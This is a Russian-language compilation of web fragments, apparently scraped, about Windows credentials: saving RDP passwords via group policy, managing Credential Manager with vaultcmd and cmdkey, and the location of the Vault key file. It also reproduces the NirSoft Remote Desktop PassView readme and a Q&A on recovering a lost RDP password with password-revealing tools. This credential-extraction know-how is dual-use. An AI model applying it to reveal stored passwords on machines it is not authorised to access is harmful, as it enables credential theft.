Зайдя в политику, поставьте переключатель в положение Включить и нажмите кнопку Показать возле Добавить серверы в список.

Включаем сохранение учетных данных при удаленном подключении в Windows

В открывшемся окне надо вручную добавить компьютеры, к которым Вы хотите подключаться с сохранением пароля. Синтаксис имеет следующий вид:

TERMSRV/[имя или адрес удаленного компьютера] — сохраняет учетные данные при подключении к конкретному компьютеру;

TERMSRV/*.domain.com — сохраняет учетные данные при подключении к компьютерам в домене domain.com;

TERMSRV/* — сохраняет учетных данные при любом подключении.

Включаем сохранение учетных данных при удаленном подключении в Windows

TERMSRV в данном случае должно быть написано именно заглавными буквами. После сохранения внесенных изменений можно форсировать применение новой политики командой gpupdate /force. После этого система начнет запоминать Ваши учетные данные при RDP-подключении.

Доступ к компьютеру по сети без ввода учетных данных

на компе 1 с win7 разшарен диск d. на компе 2 — win8.1. С компа 2 пытаюсь зайти на комп 1 — появляется окно для ввода сетевых учетных данных. В сети есть еще несколько с win7, 8, 10. все заходят без пароля, а ЭТОТ ну ни как. В Центре управления сетями выбрана Частная сеть. В Дополнительных параметрах общего доступа -> Отключить доступ с парольной защитой. В общем вот так.

Рекомендуют также настроить групповые политики, но в этой редакции виндовс групповые политики отсутствуют.

Удаленое доступ к компьютеру в сети
Подскажите пожалуста как подключится к компьютеру соединению в сеть через другой компьютер у.

Доступ к компьютеру локальной сети извне
Здравствуйте. У меня такой вот вопрос: Есть локальная сеть (Ноутбук Windows XP + стационарный.

Как закрыть доступ к компьютеру из локальной сети?
Можно ли разрешить доступ к компьютеру через Интернет, закрыв при этом доступ из локальной сети.

Как открыть полный доступ к компьютеру по локальной сети?
Объясните пожалуйста, почему при открытии «полного» доступа к тому или иному диску, папке всё-равно.

Используем диспетчер учетных данных Windows для хранения паролей

Впервые Credential Manager появился в Windows 7 и позиционируется как достаточное безопасное место для хранения ваших паролей.

В диспетчере учетных данных могут хранится следующие типы аккаунтов:

    Учетные данные Windows (Windows Credentials)– данные для входа в Windows, для доступа на удаленные компьютеры, сохраненные пароли для RDP подключений, пароли к сайтам, поддерживающих встроенную аутентификацию Windows и т.д;

В Windows Credential не хранятся данные для автоматического входа в Windows или доменные Cached Credentials.

Например, если при доступе к сетевой папке вы включите опцию “Сохранить пароль”, то введенный вами пароли будет сохранен в Credential Manager.

сохранить пароль для доступа к сетевой папке в Windows

Аналогично пароль для подключения к удаленному RDP/RDS серверу сохраняется в клиенте Remote Desktop Connection (mstsc.exe).

сохранить пароль для RDP в Windows Credential Manager

Также в менеджере паролей сохраняются пароли пользователей при их сохранении командой runas /savecred.

Вы можете получить доступ к диспетчеру учетных данных в Windows 10 из классической панели управления (Control PanelUser AccountsCredential Manager, Панель управления -> Учетные записи пользователей -> Диспетчер учетных данных).

Как вы видите, в Credential Manager теперь хранятся два пароля, которые мы сохранили ранее.

Менеджер учетных данных в Windows 10, список сохраненных пользователей и паролей

Здесь вы можете добавить сохранённый пароль, отредактировать (просмотреть сохраненный пароль из графического интерфейса нельзя) или удалить любую из записей.

Также для работы с сохраненными паролями можно использовать классический диалоговый интерфейс Windows – Stored User Names and Password. Для его вызова, выполните:

упправление сохраненными паролямя в windows credential manager

Здесь вы также можете управлять сохраненными учетными данными, а также есть функции резервного копирования и восстановления данных в Credential Manager (можно использовать для переноса базы Credential Manager на другой компьютер).

Для управления Credential Manager из командной строки используется утилита vaultcmd . Например, чтобы вывести список сохраненных учетных данных типа Windows Credentials выполните команду:

vaultcmd /listcreds:»Windows Credentials»

утилита vaultcmd для управления сохраненныймаи паролями из командой строки

Следующая команда удалит из Credential Manager все сохраненные пароли для RDP доступа:

For /F «tokens=1,2 delims= » %G in (‘cmdkey /list ^| findstr «target=TERMSRV»‘) do cmdkey /delete %H

Все сохраненные пароли хранятся в хранилище Windows Vault. Windows Vault это защищенное хранилище секретов, паролей и другой информации пользователя. Данные в Windows Vault структурированы и представляют собой набор записей, принадлежащих определенной схеме Vault. Набор ключей шифрования для записей Windows Vault хранится в файле Policy.vpol.

Для доменных он хранится в каталоге %userprofile%AppDataRoamingMicrosoftVault . Для локальных пользователей в %userprofile%AppDataLocalMicrosoftVault .

файл Policy.vpol с ключами шифрования credential manager

Для работы Credential Manager должна быть запущена служба VaultSvc:

Если служба отключена, при попытке получить доступ к Credential Manager появится ошибка

Если вы хотите заблокировать пользователям возможность сохранения сетевых паролей в Credential Manager, нужно включить политику Network access: Do not allow storage of passwords and credentials for network authentication в разделе GPO Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options.

отключить возможность сохранения паролей в Credential Manager через групповую политику

Теперь, если пользователь попытается сохранить пароль в хранилище, появится ошибка:

Как поставить пароль учётной записи Windows 10

Чтобы установить пароль учётной записи Windows 10, нужно:

  1. Нажать “Пуск” — “Параметры”
  2. Выбрать пункт “Учетные записи”, а затем — “Параметры входа”
  3. В разделе “Пароль” нажать “Добавить”
  4. Ввести пароль и подтвердить действия

Как поменять пароль учётной записи Windows:

  1. Нажмите “Пуск” — “Параметры”
  2. Выберите пункт “Учетные записи”, а затем — “Параметры входа”
  3. В разделе “Пароль” нажмите “Изменить”
  4. Поменяйте пароль и подтвердите действия, чтбы изменить пароль учётной записи

Как удалить пароль учётной записи:

  1. Нажмите клавиши Windows + R и введите netplwiz или control userpasswords2 затем нажмите Ок
  2. Выберите пользователя, для которого нужно удалить пароль и уберите галочку с пункта “Требовать ввод имени пользователя и пароля”

Если кто-то забыл пароль учётной записи Windows 10 (вы или владелец другой учётной записи), то может подойти смена пароля учётной записи через вышеописанный метод от имени администратора.

 
Remote Desktop PassView v1.02 — Recover the password of Remote Desktop Connection utility

Copyright (c) 2006 — 2014 Nir Sofer

Description

Remote Desktop PassView is a small utility that reveals the password stored by
Microsoft Remote Desktop Connection utility inside the .rdp files.


Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):


Network Password Recovery

CredentialsFileView

Versions History

  • Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
  • Version 1.01 — The configuration is now saved to a file instead of the Registry.
  • Version 1.00 — First release.

License

This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !

Be aware that selling this utility as a part of a software package is not allowed !

Disclaimer

The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.

Using Remote Desktop PassView

Remote Desktop PassView doesn’t require any installation process or additional DLL files.
Just copy the executable (rdpv.exe) to any folder you like, and run it.
After you run rdpv.exe, the main window display the passwords of .rdp located under your
«My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location

If you want to recover that password of another .rdp file, just drag the file from Explorer into
the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.

Be aware that Remote Desktop PassView can only recover the passwords created by your current
logged on user. It cannot recover the passwords of .rdp files created by other users.

Translating Remote Desktop PassView To Another Language

Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
to other languages.

In order to do that, follow the instructions below:

  1. Run Remote Desktop PassView with /savelangfile parameter:

    rdpv.exe /savelangfile

    A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility.
  2. Open the created language file in Notepad or in any other text editor.
  3. Translate all menus, dialog-boxes, and string entries to the desired language.
  4. After you finish the translation, Run Remote Desktop PassView, and all translated
    strings will be loaded from the language file.

    If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move
    it to another folder.

Feedback

If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com

Remote Desktop PassView is also available in other languages. In order to change the language of
Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
and put it in the same folder that you Installed Remote Desktop PassView utility.

Language Translated By Date Version

Arabic Abo Rehaam 11/02/2011 1.01

Bulgarian Hristo Drumev 13/01/2007  

Dutch Jan Verheijen 23/02/2015 1.02

French PasswordOne 21/02/2015  

Galician Xosé Antón Vicente rodríguez 13/01/2007  

German «Latino» auf WinTotal.de 18/09/2014 1.02

Hebrew peterg 29/04/2011  

Hungarian ZityiSoft 20/06/2009  

Italian Fabio Mastroianni 13/01/2007  

Italian Maurizio Madaro 12/01/2007  

Persian ( JAVAD JOURSARAEI Alashti ) 06/08/2014  

Persian Amirreza Nasiri 13/11/2015 1.02

Romanian Jaff (Oprea Nicolae) 05/02/2016 1.02

Russian Sonya 10/03/2010  

Simplified Chinese Rindz 30/11/2013 1.04

Slovak František Fico 09/02/2017 1.02

Spanish Spyn — Toño 21/04/2009  

Spanish arquer.net 20/05/2009  

Taiwanese Republic of Taiwan 06/01/2007  

Traditional Chinese 繁體中文 23/03/2007  

Turkish Kitap Özetleri 30/01/2009  

Turkish EFromm 11/02/2009  

  

I had found this example: http://www.nirsoft.net/utils/remote_desktop_password.html

But it turns out it doesn’t seem to work with the «newer» RDP save files.

Anybody have any tips to retrieve my lost RDP password?’

If I could simply change the ip address and use the same (hidden) login information for this one RDP file I would be saved! :S

asked Jul 27, 2012 at 6:53

darkAsPitch's user avatar

darkAsPitchdarkAsPitch

1,0566 gold badges18 silver badges29 bronze badges

3

The NirSoft Network Password Recovery tool worked for me, seems like Windows now saves Remote Desktop passwords with the other network passwords. From the tool’s description:

When you connect to a network share on your LAN or to your .NET Passport account, Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive, as long as you know the last log-on password.

Make sure you grab the x64 version if you are running on 64-bit.

Blacklight Shining's user avatar

answered Sep 24, 2013 at 11:17

pcdev's user avatar

pcdevpcdev

1911 silver badge2 bronze badges

3

You may not be able to recover the password depending on how it was stored. However I may have a workaround based on a comment you made

If I could simply change the ip address and use the same (hidden)
login information for this one RDP file I would be saved! :S

If the connection uses a DNS connection instead of a IP address you can put a entry in the HOSTS file to have it point at the different server.

If you are using IP you can use the windows tool netsh however you may need to enable the Routing and Remote Access service for the routing namespace to show up in netsh

answered Jul 27, 2012 at 17:58

Scott Chamberlain's user avatar

Scott ChamberlainScott Chamberlain

30.5k6 gold badges96 silver badges108 bronze badges

2

Like this post? Please share to your friends:
  • Посмотреть пароль от wifi windows 10 через командную строку
  • Посмотреть весь буфер обмена windows 10
  • Посмотреть пароль для wifi windows 10
  • Посмотреть версию windows 10 в install esd
  • Посмотреть пароль vpn подключения windows 10